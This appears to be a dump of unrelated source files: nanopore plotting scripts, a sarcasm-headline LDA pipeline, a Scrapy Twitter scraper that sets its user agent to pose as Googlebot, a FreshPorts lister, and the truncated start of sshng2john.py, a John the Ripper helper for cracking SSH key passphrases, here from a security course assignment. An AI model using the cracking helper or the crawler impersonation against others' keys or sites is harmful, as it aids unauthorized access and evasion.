tsuccess_wei = tsuccess2#[tsuccess2 > 1e-4]
plt.figure("hist_all", figsize=(2.75, 1.83333333333))
plt.hist(tsuccess_lata, bins=bins, color=color_lata, log=True,
alpha=0.8, rwidth=0.9, label=r"Sim. ($k_d$ from Lata)", zorder=50)
plt.hist(tsuccess_wei, bins=bins, color=color_wei, log=True,
#histtype="step", linestyle="--",
alpha=0.5, rwidth=0.9, label=r"Sim. ($k_d$ from Wei)", zorder=90)
plt.hist(fake, bins=bins, histtype="step", log=True,
linewidth=1.75,
color=color_exp, label="Experiment", zorder=100)
plt.xscale("log")
#plt.yscale("log")
plt.ylabel("Count")
plt.xlabel(r"$\tau_\mathrm{off}$ [ms]")
plt.ylim(ymin=1.)
ax = plt.gca()
ax.set_xticks([1e-6, 1e-3, 1.])
ax.set_xticks([1e-5, 1e-4, 1e-2, 1e-2, 1e-1, 1e1, 1e2], minor=True)
ax.set_xticklabels(["$\mathregular{10^{-3}}$", "1", "$\mathregular{10^3}$"])
ax.set_xticklabels([], minor=True)
#plt.xlim(xmin=.3e-6, xmax=1e2)
#plt.xlim(xmin=0.2e-4, xmax=0.9e2)
plt.legend(loc="best", frameon=False)
###### reproduce cumulative tauoff plot with fits and different bV
voltages = [-0.2, -0.25, -0.3, -0.35][::-1]
colors = ["k", "r", "b", "g"][::-1]
zrecs = [.90, .95, .99]
N = 10000
newparams = dict(N=N, dp=30., geop=dict(dp=30.))
if plot_cdf:
plt.figure("bV_tauoff", figsize=(4, 3))
for i, v in enumerate(voltages):
data = fit_koff(bV=v, zreceptor=.95, dx=dx, **newparams)
tt = np.logspace(-3., 2., 100)
lines = plt.semilogx(tt, 1. - np.exp(-tt/data.toff), color=colors[i])
plt.semilogx(data.t, data.cfd, "v", color=lines[0].get_color(),
label="%d mV" % (1000*abs(v)))
print "koff", data.koff
plt.xlim(1e-4, 1e1)
plt.xlabel(r"$\tau$ off [s]")
plt.ylabel("Cumulative probability")
plt.legend(frameon=False)
###### regression to quantify bV-koff relationship
def regression(bV, koff):
"find coefficients in relationship koff = koff0 * exp(a*bV)"
X = np.column_stack([bV, np.ones(len(bV))])
y = np.log(koff)
a, b = tuple(np.dot(np.linalg.inv(np.dot(X.T, X)), np.dot(X.T, y)))
return a, np.exp(b)
######
def koff0(kd, **params):
return fit_koff(name="wei_koff_3", bV=0., tbind=1e9/kd, **params).koff
if fit_koff0:
plt.figure("koff0", figsize=(4, 3))
kd = np.array([2., 3, 3.25, 3.5, 3.75, 4, 5.])
ko = np.array([1e3*koff0(k*1e-3, NN=5e8, nmax=10000) for k in kd])
c = ko.mean()/kd.mean()
print "F0 = %.3f pN" % (1e12*np.log(c)/(1e-9*5.5)*nanopores.kT)
# F0 = 0.184 pN
plt.axhline(y=4.5, linestyle="-", color="C0", label="Wei et al.")
plt.plot(kd, ko, "oC1", label="Simulations")
plt.plot(kd, c*kd, ":C1", label=r"Fit to $k_{off}^{V=0}$ = C*$k_d$")
plt.plot(kd, kd, ":C2", label=r"$k_{off}^{V=0}$ = $k_d$")
plt.ylim(ymin=2.2, ymax=7.5)
#plt.xlim(2.9, 4.6)
#plt.fill_between(plt.xlim(), [4.5 - 0.6]*2, [4.5 + 0.6]*2, alpha=0.5, color="C1")
#plt.xticks(kd)
#plt.yticks(kd)
#plt.xlim(plt.ylim())
#plt.axis("equal")
plt.xlabel(r"Bulk dissociation constant $k_d$ [10$^{-3}$/(Ms)]")
plt.ylabel(r"$k_{off}^{V=0}$ [10$^{-3}$/(Ms)]")
plt.legend(frameon=False, loc="upper left")
###### recreate voltage-dependent plot of koff
if voltage_dependence:
# get experimental data
plt.figure("koff", figsize=(2.2, 1.83333333))
data = np.genfromtxt("koff.csv", delimiter=",")
v = data[:, 0]
koff = data[:, 1]
c0, k0 = regression(np.abs(v), koff)
vv = np.linspace(0., 370., 10)
plt.plot(vv, k0 * np.exp(c0*vv), "-r", lw=1.75)
v = np.array([-0., -0.05, -0.1, -0.15, -0.2, -0.25, -0.3, -0.35])
mv = np.abs(v)*1e3
z = 0.95
dx = 5.6
koff = [fit_koff(bV=V, zreceptor=z, dx=dx, **newparams).koff for V in v]
c1, k1 = regression(mv[-4:], koff[-4:])
plt.plot(mv, koff, "v", markersize=7, label=r"Sim. ($k_d$ from Lata)",
color=color_lata)
plt.plot(vv, k1 * np.exp(c1*vv), "-", color=color_lata)
# and again with different kd
kd = 3.5e-3
koff1 = [fit_koff(bV=V, zreceptor=z, dx=dx,
tbind=1e9/kd, **newparams).koff for V in v]
c2, k2 = regression(mv[-4:], koff1[-4:])
plt.plot(mv, koff1, "o", markersize=7, label=r"Sim. ($k_d$ from Wei)",
color=color_wei)
#mfc="None", mec=color_wei)
#plt.plot(vv, k2 * np.exp(c2*vv), ":", color="#990000")
v = data[:, 0]
koff2 = data[:, 1]
plt.plot(v, koff2, "s", mfc="None", mec=color_exp,
markersize=6, mew=1.75, label="Experiment")
plt.yscale("log")
plt.ylim(ymax=.9e3)
plt.xlabel("Voltage [mV]")
plt.ylabel(r"$k_\mathrm{off}$ [1/s]")
plt.legend(frameon=False, loc="upper left")
plt.figure("koff_simple", figsize=(1.7, 1.6))
plt.plot(mv, koff1, "o", markersize=7, label=r"Simulation", color=color_wei)
plt.plot(v, koff2, "s", markersize=6, mew=1.75,
label=r"Experiment", mec=color_exp, mfc="None")
plt.yscale("log")
#plt.xlabel("Voltage [mV]")
#plt.ylabel("k off [1/s]")
plt.ylabel(ur"$\log(k_\mathrm{off})$")
plt.xlabel("Voltage")
plt.tick_params(
axis="both", # changes apply to the x-axis
which="both", # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
left=False,
right=False,
labelleft=False,
labelbottom=False)
plt.legend(frameon=False)
plt.title("Reaction kinetics")
###### read koff-bV dependence from wei data
koff0 = np.array([])
coeff = np.array([])
for i in range(1, 6):
data = np.genfromtxt("koff%d.csv" %i, delimiter=",")
voltages = data[:, 0]*1e-3
koff = data[:, 1]
c, k = regression(np.abs(voltages), koff)
coeff = np.append(coeff, c)
koff0 = np.append(koff0, k)
cdxall_exp = coeff
cdx_exp = coeff.mean()
vdx_exp = coeff.std()
###### plt determination of bond rupture length from wei data and simulations
if determine_delta:
voltages = [-0.2, -0.25, -0.3, -0.35]
zrecs = [.90, .95, .99]
dxtest = 5.
dx = dxtest
koff0 = np.array([])
coeff = np.array([])
for z in zrecs:
for v, koff in nanopores.collect(voltages):
data = fit_koff(bV=v, zreceptor=z, dx=dx, **newparams)
koff.new = data.koff
c, k = regression(np.abs(voltages), koff)
coeff = np.append(coeff, c)
koff0 = np.append(koff0, k)
cdxtest_sim = coeff.mean()
dx0 = cdx_exp / (cdxtest_sim / dxtest)
print "inferred dx:", dx0
dxs = [2., 3., 4., 5., 5.5, 6., 7., 8., 9.]
cdx = []
cdxstd = []
cdxall = []
for dx in dxs:
#print "dx", dx
koff0 = np.array([])
coeff = np.array([])
for z in zrecs:
for v, koff in nanopores.collect(voltages):
data = fit_koff(bV=v, zreceptor=z, dx=dx, **newparams)
koff.new = data.koff
c, k = regression(np.abs(voltages), koff)
coeff = np.append(coeff, c)
koff0 = np.append(koff0, k)
cdx.append(coeff.mean())
cdxall.append(coeff)
cdxstd.append(coeff.std())
#print "c*dx %.3g +- %.3g" % (coeff.mean(), coeff.std())
#print "koff0 %.3g +- %.3g" % (koff0.mean(), koff0.std())
def fplot(cdx, dx):
return cdx
dx = np.array(dxs)
cdx = np.array(cdx)
cdxall = np.array(cdxall)
cdxstd = np.array(cdxstd)
dxx = np.linspace(dx[0], dx[-1], 100)
cdx_exp = np.ones(len(dxx))*cdx_exp
vdx_exp = np.ones(len(dxx))*vdx_exp
plt.figure("delta", figsize=(4, 3))
plt.plot(dxx, fplot(cdx_exp, dxx), "-", label="Wei et al.")
for i in range(5):
plt.plot(dxx, np.ones(len(dxx))*cdxall_exp[i], "-", color="C0", alpha=0.5)
#plt.plot(dxx, fplot(cdx_exp - vdx_exp, dxx), "-", color="C1")
#plt.plot(dxx, fplot(cdx_exp + vdx_exp, dxx), "-", color="C1")
#plt.fill_between(dxx, fplot(cdx_exp - vdx_exp, dxx),
# fplot(cdx_exp + vdx_exp, dxx), alpha=0.5)
#plt.plot(dx, fplot(cdx, dx), "o", label="Simulation")
plt.plot(dx, fplot(cdx, dx), "o", label="Simulations", color="C1")
for i in (0, 1, 2):
plt.plot(dx, fplot(cdxall[:, i], dx), "o", color="C1", alpha=0.5)
#plt.fill_between(dx, fplot(cdx - cdxstd, dx), fplot(cdx + cdxstd, dx), alpha=0.5)
plt.annotate(r"$\delta$=5.5nm", (5.5, cdxall[4, 0] - 1.),
xytext=(5.5 - .79, cdxall[4, 0] - 8.), color="C1",
arrowprops=dict(arrowstyle="->", color="C1"))
plt.xlabel(r"Bond rupture length $\delta$ [nm]")
plt.ylabel(r"$\alpha$ [1/V]")
plt.legend(loc="upper left", frameon=False)
import folders
nanopores.savefigs("tau_off2", folders.FIGDIR_HOWORKA + "/wei", ending=".pdf")
#nanopores.savefigs("tau_off2", folders.FIGDIR + "/wei", ending=".eps")
```
#### File: scripts/wei/tau_off_newton.py
```python
import numpy as np
from numpy import exp, expm1
from matplotlib import pyplot as plt
def f(x):
return exp(x)/(2.*expm1(x)/x - 1.)
def f1(x):
y = 2.*expm1(x)/x - 1.
z = 2./x**2*(x*exp(x) - expm1(x))
return exp(x)*(1 - z/y)/y
def solve(C, n=20):
x = 2.*C # initial value
print "Newton iteration:"
for i in range(n):
dx = -(f(x) - C)/f1(x)
x = x + dx
print i, "Residual", f(x) - C, "Value", x
print
return x
def get_parameters(mu, sigma):
C = mu**2/sigma**2
ap = solve(C, 10)
lmbda = ap/(mu*(1. - exp(-ap)))
return ap, lmbda
# get experimental event data
csvfile = "tau_off_wei.csv"
data = np.genfromtxt(csvfile, delimiter=",")
bins = data[:, 0]
counts = data[:, 1]
# inspection showed that there seems to be a good,
# evenly spaced approximation to all bins except the first and last with
# spacing 0.55, i.e. of the form (beta + 0.55*np.arange(0, N)) for some beta
x = bins[:-1]
N = len(x)
# minimize norm(x - (beta + 0.55*np.arange(0, N)) w.r.t. beta
beta = x.mean() - 0.55*(N-1)/2.
# turns out beta is close to 0.25, which gives nice numbers,
# so we will just take that
bins = 0.25 + 0.55*np.arange(0, N)
bins = [0.] + list(bins) + [20.]
N = N+1
# the counts should be integer-values, so
counts = np.round(counts).astype(int)
# now let's reproduce the plot
# first create fake data samples that reproduce the histogram
fake = np.array([])
frac = 1.
while frac > 0.5: #int(counts[0]*frac) > 1:
frac /= 2.
a, b = bins[1]*frac, bins[1]*2*frac
sample = a*(b/a)**(np.random.rand(int(counts[0]*frac)))
fake = np.append(fake, sample)
print "frac", frac
for i in range(1, N):
a, b = bins[i], bins[i+1]
sample = a*(b/a)**(np.random.rand(counts[i]))
fake = np.append(fake, sample)
# compute mu, variance, solve for parameters
mu = np.mean(fake)
sigma = np.std(fake)
ap, lmbda = get_parameters(mu, sigma)
print "mu, sigma =", mu, sigma
print "mu^2/sigma^2 =", mu**2/sigma**2
print "ap, lambda =", ap, lmbda
print
print "binding probability: %.3f (for a=2.2)" % (ap/2.2,)
print "mean binding duration: %.3f s" % (1./lmbda,)
#
#
#X = linspace(0., 10., 100)
#plt.plot(X, f(X, 0.))
#plt.plot(X, X/2.)
#plt.show()
``` |
{
"source": "jhwong18/Sarcasm-Detector-for-News-Headline-",
"score": 3
} |
#### File: src/data_processing/data_processing_helpers.py
```python
import os
import numpy as np
import pandas as pd
from datetime import datetime as dt
import logging
import string
import re
from data_processing.helpers import Config
import data_processing.helpers as helpers
logger = logging.getLogger('sarcasm_detector')
class DataLoad:
"""Load the JSON dataset, convert into pandas dataframe and check for null values in each column"""
def __init__(self, data_path="data/Sarcasm_Headlines_Dataset.json"):
self.data_path = data_path
self.df = None
def load_jsondata(self):
"""Load JSON dataset and convert into pandas dataframe"""
self.df = pd.read_json(self.data_path, lines=True)
logger.info('{} dataset loaded'.format(self.data_path))
def filter_columns(self):
"""Remove columns in dataset"""
self.df = self.df[['headline', 'is_sarcastic']]
def check_null_for_sarcasm(self):
"""Check for null values in target variable: is_sarcastic"""
logger.info('{} columns with valid target values'.format(len(self.df.is_sarcastic)))
logger.info('{} columns with empty target values'.format(len(self.df.is_sarcastic) -
len(self.df.is_sarcastic.isnull())))
def check_null_for_headlines(self):
"""Check for null values in feature variable: headline"""
logger.info('{} columns with valid headlines'.format(len(self.df.headline)))
logger.info('{} columns with empty headlines'.format(len(self.df.headline) -
len(self.df.headline.isnull())))
def run(self):
"""Top-level method in class for running all other methods in the class"""
self.load_jsondata()
self.filter_columns()
self.check_null_for_headlines()
self.check_null_for_sarcasm()
return self.df
class DataProcessing:
"""Perform preprocessing of data in order to perform the subsequent analysis and modelling
Preprocessing steps:
- Ensure all words in a headline is in lowercase
- Remove punctuation in headlines
- Create a new column to calculate the number of words in a headline
- Create a new column to calculate the number of unique words in a headline
- Create a new column to determine whether a headline contains numbers/digits
"""
def __init__(self):
self.df = DataLoad().run()
def convert_headline_lowercase(self):
"""Ensure all words in a headline is in lowercase"""
self.df['headline'] = self.df['headline'].apply(lambda x: x.lower())
def remove_headline_punctuation(self):
"""Remove punctuation in headlines"""
self.df['headline'] = self.df['headline'].apply(lambda x: ' '.join(word.strip(string.punctuation)
for word in x.split()))
def create_headline_count(self):
"""Create a new column to calculate the number of words in a headline """
self.df['headline_count'] = self.df['headline'].apply(lambda x: len(list(x.split())))
def create_headline_unique_count(self):
"""Create a new column to calculate the number of unique words in a headline"""
self.df['headline_unique_word_count'] = self.df['headline'].apply(lambda x: len(set(x.split())))
def create_headline_digit(self):
"""Create a new column to determine whether a headline contains numbers/digits"""
self.df['headline_has_digits'] = self.df['headline'].apply(lambda x: bool(re.search(r'\d', x)))
def run(self):
"""Top-level method in class for running all other methods in the class"""
logger.info('Starting data processing...')
self.convert_headline_lowercase()
self.remove_headline_punctuation()
self.create_headline_count()
self.create_headline_unique_count()
self.create_headline_digit()
logger.info('Data processing completed')
return self.df
```
#### File: src/models/lda.py
```python
import pandas as pd
import re
import numpy as np
import nltk
import spacy
from spacy.lang.en import English
import en_core_web_sm
from nltk.corpus import wordnet as wn
from nltk.stem.wordnet import WordNetLemmatizer
import gensim
from gensim import corpora
import pickle
from tqdm import tqdm
import pyLDAvis.gensim
import logging
import warnings
from data_processing.data_processing_helpers import DataProcessing
import data_processing.helpers as helpers
from data_processing.helpers import Config
warnings.filterwarnings("ignore", category=DeprecationWarning)
logger = logging.getLogger('sarcasm_detector')
class LDAPreProcessing:
"""Perform preprocessing of data in order to perform LDA
Preprocessing steps:
- Tokenize the headlines
- Ensure all words in a headline is in lowercase
- Remove headlines with only a few words (<4 words)
- Lemmatize the headlines
"""
try:
nltk.data.find('corpora/stopwords')
except LookupError:
nltk.download('stopwords')
try:
nltk.data.find('corpora/wordnet')
except LookupError:
nltk.download('wordnet')
def __init__(self):
self.df = DataProcessing().run()
self.text_data = []
self.dictionary = {}
self.corpus = []
en_core_web_sm.load()
self.en_stop = set(nltk.corpus.stopwords.words('english'))
self.parser = English()
def tokenize(self, text):
"""this function is to tokenize the headline into a list of individual words"""
lda_tokens = []
# need to use parser for python to treat the list as words
tokens = self.parser(text)
for token in tokens:
# to ignore any whitespaces in the headline, so that token list does not contain whitespaces
if token.orth_.isspace():
continue
elif token.like_url:
lda_tokens.append('URL')
elif token.orth_.startswith('@'):
lda_tokens.append('SCREEN_NAME')
else:
lda_tokens.append(token.lower_) # tokens (headlines) are already in lowercase
return lda_tokens
def get_lemma(self, word):
"""this function is to lemmatize the words in a headline into its root form"""
# converts the word into root form from wordnet
lemma = wn.morphy(word)
if lemma is None:
return word
else:
return lemma
def prepare_text_for_lda(self, text):
"""To tokenize, remove headlines with only a few words (<4 words), lemmatize words in headlines"""
tokens = self.tokenize(text) # parse and tokenize the headline into a list of words
tokens = [token for token in tokens if len(token) > 4] # remove headlines with only length of 4 words or less
tokens = [token for token in tokens if token not in self.en_stop] # remove stopwords in the headline
tokens = [self.get_lemma(token) for token in tokens] # lemmatize the words in the headline
return tokens
def run(self):
"""Top-level method in class for preprocessing the data for LDA model"""
logger.info('Starting data processing for LDA...')
logger.info('Starting to tokenize dataset...')
for i in tqdm(range(0, len(self.df.headline))):
headline = self.df.headline[i]
tokens = self.prepare_text_for_lda(headline)
self.text_data.append(tokens)
logger.info('Tokens created from dataset')
logger.info('Starting to convert headlines into corpus and dictionary...')
# Convert all headlines into a corpus of words, with each word as a token
self.dictionary = corpora.Dictionary(self.text_data)
# Convert each headline (a list of words) into the bag-of-words format. (Word ID, Count of word)
self.corpus = [self.dictionary.doc2bow(text) for text in self.text_data]
logger.info('Corpus and dictionary created from dataset')
pickle.dump(self.corpus, open('result/visualization/corpus.pkl', 'wb'))
logger.info('Corpus saved as corpus.pkl in visualization folder')
# takes a while to run the dictionary and corpus
self.dictionary.save('result/visualization/dictionary.gensim')
logger.info('Dictionary saved as dictionary.gensim in visualization folder')
return self.dictionary, self.corpus
class LDA:
"""Perform LDA on the dataset and obtain the results in terms of number of topics and distribution of words
in each topic
Results:
- Topics and distribution of words in each topic as a linear combination of coefficients (in results/logs)
- Interactive visualization for each topic and distribution of words in each topic (in results/visualization)
"""
def __init__(self, config_path='config.yaml'):
self.config = Config(config_path)
self.dictionary, self.corpus = LDAPreProcessing().run()
self.NUM_TOPICS = self.config.NUM_TOPICS
def model(self):
"""this function is to tokenize the headline into a list of individual words"""
ldamodel = gensim.models.ldamodel.LdaModel(self.corpus, num_topics=self.NUM_TOPICS,
id2word=self.dictionary, passes=15)
ldamodel.save('result/visualization/{}.gensim'.format(str(self.NUM_TOPICS) + '_Topic'))
logger.info('LDA Model saved as visualization/{}.gensim in visualization folder'.format(
str(self.NUM_TOPICS) + '_Topic'))
logger.info('-----------------')
logger.info('Results for LDA model with {} (top 5 words in each topic):'.format(str(self.NUM_TOPICS)))
logger.info('-----------------')
logger.info(ldamodel.print_topics(num_words=5))
lda_display = pyLDAvis.gensim.prepare(ldamodel, self.corpus, self.dictionary, sort_topics=False)
pyLDAvis.display(lda_display)
pyLDAvis.save_html(lda_display, 'result/visualization/lda_{}.html'.format(str(self.NUM_TOPICS) + '_Topic'))
logger.info(
'LDA Model Visualization saved as visualization/lda_{}.html in visualization folder'.format(
str(self.NUM_TOPICS) + '_Topic'))
def run(self):
"""Top-level method in class for running the LDA to generate the HTML visualizations"""
self.model()
``` |
{
"source": "jhwong18/Twitter-Web-Scrapping-with-Scrapy",
"score": 3
} |
#### File: Twitter-Web-Scrapping-with-Scrapy/TwitterCrawler/pipelines.py
```python
import psycopg2
class TwittercrawlerPipeline(object):
def open_spider(self, spider):
hostname = 'localhost'
username = 'postgres'
password = '*****' # your password
database = 'twitter_tweets'
self.connection = psycopg2.connect(host=hostname, user=username, password=password, dbname=database)
self.cur = self.connection.cursor()
def close_spider(self, spider):
self.cur.close()
self.connection.close()
def process_item(self, item, spider):
self.cur.execute("INSERT INTO profile_tweets(username, full_name, twitter_url, tweet_text, tweet_time, number_of_likes, no_of_retweets, no_of_replies, mentions, no_of_mentions, hashtags, no_of_hashtags, call_to_action, image_url) "
"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)", (item['username'], item['full_name'], item['twitter_url'],
item['tweet_text'], item['tweet_time'], item['number_of_likes'],
item['no_of_retweets'], item['no_of_replies'], item['mentions'],
item['no_of_mentions'], item['hashtags'], item['no_of_hashtags'],
item['call_to_action'], item['image_url']))
self.connection.commit()
pass
```
#### File: TwitterCrawler/spiders/profile.py
```python
import scrapy
import ipdb
import re
from dateutil import parser
import sys
from scrapy.crawler import CrawlerProcess
from utils import get_links, get_hashtags, get_mentions
import logging
import pandas as pd
import os
from TwitterCrawler.items import TwitterprofilecrawlerItem
class ProfileSpider(scrapy.Spider):
name = 'TwitterCrawler'
allowed_domains = ["twitter.com"]
COUNT_MAX = 500 # maximum number of tweets scraped
# custom settings for user agent and proxy. Default will get chrome as user agent and use a proxypool of 50 .
# Override here
custom_settings = {
'USER_AGENT': 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; '
'+http://www.google.com/bot.html) Safari/537.36',
'CONCURRENT_REQUESTS': 5, 'DOWNLOAD_DELAY': 0, 'LOG_LEVEL': 'INFO', 'CLOSESPIDER_PAGECOUNT': COUNT_MAX}
def __init__(self, filename='', is_csv=False):
if not filename:
sys.exit('Please provide the input filename')
self.filename = filename
# the crawler will execute start_requests function at first.
def start_requests(self):
with open(self.filename, 'r') as f:
profiles = f.read().splitlines()
if len(profiles) == 0:
sys.exit('Empty File detected.Please provide profiles separated by newlines')
else:
logging.info(f'{len(profiles)} profiles found')
for profile in profiles:
if profile:
search_url = "https://mobile.twitter.com/" + profile.lower()
yield scrapy.Request(search_url, callback=self.find_tweets, dont_filter=True)
def find_tweets(self, response):
tweets = response.xpath('//table[@class="tweet "]/@href').getall()
logging.info(f'{len(tweets)} tweets found')
for tweet_id in tweets:
tweet_id = re.findall("\d+", tweet_id)[-1]
tweet_url = 'https://twitter.com/anyuser/status/' + \
str(tweet_id)
yield scrapy.Request(tweet_url, callback=self.parse_tweet)
# finding and visiting next page
next_page = response.xpath(
'//*[@class="w-button-more"]/a/@href').get(default='')
logging.info('Next page found:')
if next_page != '':
next_page = 'https://mobile.twitter.com' + next_page
yield scrapy.Request(next_page, callback=self.find_tweets)
def parse_tweet(self, response):
logging.info('Processing --> ' + response.url)
username = response.xpath(
'//*[@class="permalink-inner permalink-tweet-container"]//*[@class="username u-dir '
'u-textTruncate"]/b/text()').get(
default='')
full_name = response.xpath(
'//*[@class="permalink-inner permalink-tweet-container"]//*[@class="FullNameGroup"]/strong/text()').get(
default='')
try:
tweet_text = response.xpath('//title/text()').get(default='').split(':')[1].strip()
except:
tweet_text = ' '.join(response.xpath(
'//*[contains(@class,"permalink-inner permalink-tweet-container")]//*['
'@class="js-tweet-text-container"]/p//text()').getall()).strip()
image_list = response.xpath(
'//*[contains(@class,"permalink-inner permalink-tweet-container")]//*['
'@class="AdaptiveMediaOuterContainer"]//img/@src').getall()
date_time = response.xpath(
'//*[contains(@class,"permalink-inner permalink-tweet-container")]//*[@class="js-tweet-details-fixer '
'tweet-details-fixer"]/div[@class="client-and-actions"]/span[@class="metadata"]/span/text()').get(
default='')
date_time = parser.parse(date_time.replace('-', '')).strftime('%Y-%m-%d %H:%M:%S')
retweets = response.xpath(
'//*[contains(@class,"permalink-inner permalink-tweet-container")]//*[@class="js-tweet-details-fixer '
'tweet-details-fixer"]/div[@class="js-tweet-stats-container tweet-stats-container"]//*['
'@class="js-stat-count js-stat-retweets stat-count"]/a/strong/text()').get(
default='')
likes = response.xpath(
'//*[contains(@class,"permalink-inner permalink-tweet-container")]//*[@class="js-tweet-details-fixer '
'tweet-details-fixer"]/div[@class="js-tweet-stats-container tweet-stats-container"]//*['
'@class="js-stat-count js-stat-favorites stat-count"]/a/strong/text()').get(
default='')
replies = response.xpath(
'//*[contains(@class,"permalink-inner permalink-tweet-container")]//*[contains(@id,'
'"profile-tweet-action-reply-count")]/parent::span/@data-tweet-stat-count').get(
default='')
mentions = get_mentions(tweet_text)
hashtags = get_hashtags(tweet_text)
cta = get_links(tweet_text)
crawlerItem = TwitterprofilecrawlerItem(username=username.lower(),
full_name=full_name,
twitter_url=response.url,
tweet_text=tweet_text,
tweet_time=str(date_time),
number_of_likes=str(likes),
no_of_retweets=str(retweets),
no_of_replies=str(replies),
mentions=' | '.join(mentions),
no_of_mentions=str(len(mentions)),
hashtags=' | '.join(hashtags),
no_of_hashtags=str(len(hashtags)),
call_to_action=' | '.join(cta),
image_url=' | '.join(image_list))
yield crawlerItem
```
#### File: jhwong18/Twitter-Web-Scrapping-with-Scrapy/utils.py
```python
import re
def find_emails(text):
"""
It will parse the given string and return a list of emails if found
Example:
>>find_emails('hello\n find me here\n<EMAIL>')
['<EMAIL>']
:param text: string
:return: list
"""
return re.findall(r"([a-zA-Z0-9+._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9_-]+)", text)
def get_mentions(text):
"""
It will return mentions from the text i.e @someone
:param text: string
:return: list
example
>>> get_mentions('Hi @hero, How are you? I hope @hero2 is fine. BTW say hi to @heroine for me')
['hero','hero2','heroine']
"""
result = re.findall("(^|[^@\w])@(\w{1,15})", text)
if len(result) != 0:
result = [i[1] for i in result]
return result
def get_hashtags(text):
"""
It will return hashtags from the text i.e #something
:param text: string
:return: list
example
>>> get_hashtags('my first code #programmer #python #awesome #grepsr')
['programmer','python','awesome','grepsr']
"""
result = re.findall("(^|[^@\w])#(\w{1,15})", text)
if len(result) != 0:
result = [i[1] for i in result]
return result
def get_links(text):
"""
It will return website links from the text
:param text: string
:return: list
example
>>> message = 'http://twitter.com Project URL: https://app.grepsr.com/app/project/message/70454'
>>> get_links(message)
['http://twitter.com', 'https://app.grepsr.com/app/project/message/70454']
"""
result = re.findall(r"(?P<url>https?://[^\s]+)", text)
return result
``` |
{
"source": "jhx0/portupdate",
"score": 3
} |
#### File: jhx0/portupdate/portupdate.py
```python
import re
import emoji
import requests
import argparse
from bs4 import BeautifulSoup
from colorama import init, Fore, Style
# the URL should not be changed
url = 'https://www.freshports.org/'
# max number of port updates to show
# tune this to your needs
max_updates = 10
basicFlag = False
def showUpdates():
init()
data = requests.get(url)
html = BeautifulSoup(data.text, 'html.parser')
count = 0
for item in html.find_all('span', { 'class': 'element-details' }):
if count >= max_updates:
break
name, version = item.text.split(" ")
if basicFlag:
print("{: <50}{}".format(name, version))
else:
print("{} {: <50}{}".format(emoji.emojize(':package:'),
Fore.GREEN + Style.BRIGHT + name,
Fore.RED + Style.BRIGHT + version))
count += 1
def main():
showUpdates()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--basic", help="simple output", action="store_true")
args = parser.parse_args()
basicFlag = args.basic
main()
``` |
{
"source": "jhxie/cmput333",
"score": 2
} |
#### File: a1sliding/run/sshng2john.py
```python
import traceback
import binascii
import base64
import sys
try:
from hashlib import md5 as MD5
except ImportError:
from md5 import md5 as MD5
limited = False
PY3 = sys.version_info[0] == 3
if PY3:
from io import StringIO
else:
from StringIO import StringIO
class Object(object):
pass
try:
from Crypto.Cipher import DES3, AES
except ImportError:
AES = Object()
AES.MODE_CBC = ""
DES3 = Object()
DES3.MODE_CBC = ""
limited = True
class BERException (Exception):
pass
class BER(object):
"""
Robey's tiny little attempt at a BER decoder.
"""
def __init__(self, content=''):
self.content = content
self.idx = 0
def __str__(self):
return self.content
def __repr__(self):
return 'BER(\'' + repr(self.content) + '\')'
def decode(self):
return self.decode_next()
def decode_next(self):
if self.idx >= len(self.content):
return None
ident = ord(self.content[self.idx])
self.idx += 1
if (ident & 31) == 31:
# identifier > 30
ident = 0
while self.idx < len(self.content):
t = ord(self.content[self.idx])
self.idx += 1
ident = (ident << 7) | (t & 0x7f)
if not (t & 0x80):
break
if self.idx >= len(self.content):
return None
# now fetch length
size = ord(self.content[self.idx])
self.idx += 1
if size & 0x80:
# more complimicated...
# FIXME: theoretically should handle indefinite-length (0x80)
t = size & 0x7f
if self.idx + t > len(self.content):
return None
size = inflate_long(self.content[self.idx: self.idx + t], True)
self.idx += t
if self.idx + size > len(self.content):
# can't fit
return None
data = self.content[self.idx: self.idx + size]
self.idx += size
# now switch on id
if ident == 0x30:
# sequence
return self.decode_sequence(data)
elif ident == 2:
# int
return inflate_long(data)
else:
# 1: boolean (00 false, otherwise true)
raise BERException('Unknown ber encoding type %d (robey is lazy)' % ident)
def decode_sequence(data):
out = []
b = BER(data)
while True:
x = b.decode_next()
if x is None:
break
out.append(x)
return out
decode_sequence = staticmethod(decode_sequence)
class SSHException (Exception):
"""
Exception raised by failures in SSH2 protocol negotiation or logic errors.
"""
pass
class AuthenticationException (SSHException):
"""
Exception raised when authentication failed for some reason. It may be
possible to retry with different credentials. (Other classes specify more
specific reasons.)
@since: 1.6
"""
pass
class PasswordRequiredException (AuthenticationException):
"""
Exception raised when a password is needed to unlock a private key file.
"""
pass
class BadAuthenticationType (AuthenticationException):
"""
Exception raised when an authentication type (like password) is used, but
the server isn't allowing that type. (It may only allow public-key, for
example.)
@ivar allowed_types: list of allowed authentication types provided by the
server (possible values are: C{"none"}, C{"password"}, and
C{"publickey"}).
@type allowed_types: list
@since: 1.1
"""
allowed_types = []
def __init__(self, explanation, types):
AuthenticationException.__init__(self, explanation)
self.allowed_types = types
def __str__(self):
return SSHException.__str__(self) + ' (allowed_types=%r)' % self.allowed_types
class PartialAuthentication (AuthenticationException):
"""
An internal exception thrown in the case of partial authentication.
"""
allowed_types = []
def __init__(self, types):
AuthenticationException.__init__(self, 'partial authentication')
self.allowed_types = types
class ChannelException (SSHException):
"""
Exception raised when an attempt to open a new L{Channel} fails.
@ivar code: the error code returned by the server
@type code: int
@since: 1.6
"""
def __init__(self, code, text):
SSHException.__init__(self, text)
self.code = code
class BadHostKeyException (SSHException):
"""
The host key given by the SSH server did not match what we were expecting.
@ivar hostname: the hostname of the SSH server
@type hostname: str
@ivar key: the host key presented by the server
@type key: L{PKey}
@ivar expected_key: the host key expected
@type expected_key: L{PKey}
@since: 1.6
"""
def __init__(self, hostname, got_key, expected_key):
SSHException.__init__(self, 'Host key for server %s does not match!' % hostname)
self.hostname = hostname
self.key = got_key
self.expected_key = expected_key
from binascii import hexlify, unhexlify
import struct
def inflate_long(s, always_positive=False):
"""turns a normalized byte string into a long-int
(adapted from Crypto.Util.number)"""
out = 0
negative = 0
if not always_positive and (len(s) > 0) and (ord(s[0]) >= 0x80):
negative = 1
if len(s) % 4:
filler = '\x00'
if negative:
